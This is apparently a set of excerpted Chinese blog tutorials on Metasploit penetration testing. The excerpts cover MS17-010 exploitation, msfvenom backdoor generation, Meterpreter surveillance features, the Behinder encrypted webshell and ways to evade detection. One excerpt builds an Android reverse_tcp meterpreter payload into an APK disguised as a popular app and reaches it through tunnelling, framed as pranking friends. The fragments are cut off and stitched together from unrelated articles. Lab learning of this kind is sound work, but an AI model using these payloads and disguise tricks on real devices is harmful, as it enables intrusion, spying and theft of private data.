学习目标：例如：1.使用msf进行ms17_010漏洞利用（成功拿到shell截图取证）2.使用msfvonom进行权限维持（后门木马生成，利用第一步shell进行上传）3.利用msf监听模块进行监听第一步：利用msf进行ms17_010经典漏洞攻击1.使用nmap对靶机进行永恒之蓝漏洞扫描命令：nmap-A192.168.232.134发现改IP存在永恒之蓝漏洞，利用msfconsole进行攻击命令：msfconsole  (打开msf)           searchms17 (搜索ms17_010漏洞利用模块)之后使用exp攻击模块，这里我们可以看到auxiliaray辅助模块（有兴趣

首先开篇先放出我使用的kali与win7的网盘链接：链接:https://pan.baidu.com/s/1tvrj41wLRY4ZTfJG8mDwVA?pwd=v6e4提取码:v6e4大家VMware上新建虚拟机即可~简单介绍一个Metasploit，一个免费的、开源的渗透测试框架，kali上可以直接使用~1.Metasploit初始化在使用之前我们需要对Metasploit进行初始化，并启动：终端窗口的命令行输入如下命令systemctlstartpostgresqlsystemctlenablepostgresql启动专用的数据库，并设置为每次开机自动启动msfconsole或者点击ka

作者:SwBack技术交流Q群:768493664文章在饭前编写，由于着急吃饭，所以排版比较乱环境配置工具型号接入方式kali2021桥接安卓手机小米11WIFIAndroidKillerV1.3.1.0apktools2.6.1实验过程中小米11未提示风险，(仅签名问题提示非小米应用商店app)但是功能实际都被拦截，无法获取敏感信息,如通话记录,短信等。当开启权限之后，信息被成功获取。如文章最下图实战过程中可以对app进行伪装，修改图标,标题,版本，签名如(XX直播,XX视频,刷赞,兼职,XX游戏等等)启动kali后,先查看自己本机IP地址如下┌──(root💀kali)-[~/桌面]└─#

注意：本篇文章仅用于学习笔记记录与交流，不得用于其他违规用途。一、Meterpreter简介Meterpreter比系统shell更加灵活，功能更加丰富，例如监控主机，监控键盘，开启摄像头，麦克风，还可以灵活的获取你的操作系统信息。高级，动态，可扩展的payload,一站式后攻击payload；基于meterpreter上下文利用更多漏洞发起攻击；后渗透测试阶段一站式操作界面；完全基于内存的DLL注入式payload（不写硬盘）注入合法系统进程并建立stager基于stager上传和预加载DLL进行扩展模块的注入(客户端API)基于stager建立的socket连接建立加密的TLS/1.0通信

1、MSF初识：MSF即MetasploitFramework，是一个综合性的渗透测试工具，集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。目前安装的kali都自带MSF，可以直接在图形界面打开也可以在kali的终端通过使用命令msfconsole来打开。2、MSF的目录结构和基本命令1）msf的安装目录：┌──(kali㉿kali)-[~]└─$ls/usr/share/metasploit-framework/或者2022版kali以后（在这之前的版本不知道可不可行）的直接桌面按如下步骤找到msf安装目录。2）msf主要目录：2.1、modules目录，子目录是一些用于渗透攻击的模块

一、实验环境1.攻击方：攻击环境使用KALI系统（使用虚拟机搭建）的Metasploit模块，msfconsole是metasploit中的一个工具，它集成了很多漏洞的利用的脚本，并且使用起来很简单的网络安全工具。这里要特别强调：被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306，故而一般情况下要求被攻击的服务器开启了3306端口号。2.被攻击MySQL环境：Windows的PHPStudy环境搭建的MySQL服务这里特别要注意MySQL需要启动允许远程访问，因为渗透环境是Kali虚拟机访问windows系统安装的MySQL环境，渗透成功的前提是MySQL允许远程

简介冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端，由于通信流量被加密，传统的WAF、IDS设备难以检测，给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密，且加密密钥是由随机数函数动态生成，因此该客户端的流量几乎无法检测。github地址：https://github.com/rebeyond/Behinder/releases在流量层，冰蝎的aes特征一直是厂商查杀的重点，在主机层，aes相关的API也是一个强特征。既然是特征，那就一定存在一个一成不变的常量，那我们就把这个特征泛化一下，让他成为变量。为了一劳永逸解决这个问题，v4.0版本提供了传输协

Metasploit简介Metasploit框架渗透测试者的困扰：在众多相同类型的工具，丌知道如何选择。认为需要掌插数百个工具软件，上千个命令参数，实在记丌住。新出现的漏洞POC/EXP有丌同的运行环境要求，准备工作繁琐。大部分时间都在学习丌同工具的使用习惯，如果能统一就好了，迚而Metasploit就产生了。POC，全称”ProofofConcept”，中文“概念验证”，常挃一段漏洞证明的代码。EXP，全称”Exploit”，中文“利用”，挃利用系统漏洞迚行攻击的劢作。Metasploit框架是可以添加漏洞代码片段，就好比一个军火库，它里面有各种武器供我使用，当然也有新的武器被研发出来，放到

文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1解决办法2.2参数LHOST/SRVHOST配置不当2.2.1解决办法2.3使用了NAT模式2.3.1解决办法2.4存在杀软/EDR终端管理等2.4.1解决办法2.5漏洞利用模块存在问题2.5.1解决办法2.6目标已经修复漏洞打了补丁2.6.1解决办法2.7防火墙限制2.7.1解决办法1.引言在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块：exploit/windows/smb/psexecexploit/multi/http/tomcat_mgr_uploadexploit/windows/s

声明：本文章仅做娱乐和学习，切勿非法使用！！本人技术一般，水平有限，如有不对请多多指正。一、环境准备KaliLinux安卓手机一部（安卓11）二、内网穿透要想玩的好，总不能本地玩自己吧，也得和周边朋友开个玩笑吧，所以就得做内网穿透了，免费内网穿透可以看这位大佬的CSDN博主「LisaCpolar」我这边用的是自己frp拿自己服务器做了内网穿透三、木马生成并加到apk直接用msf生成的apk打开没有内容，安装报毒，且目前的安卓11以上无法直接安装，msfvenom-pandroid/meterpreter/reverse_tcpLHOST=本地ip>LPORT=本地端口号>R>文件名>.apk网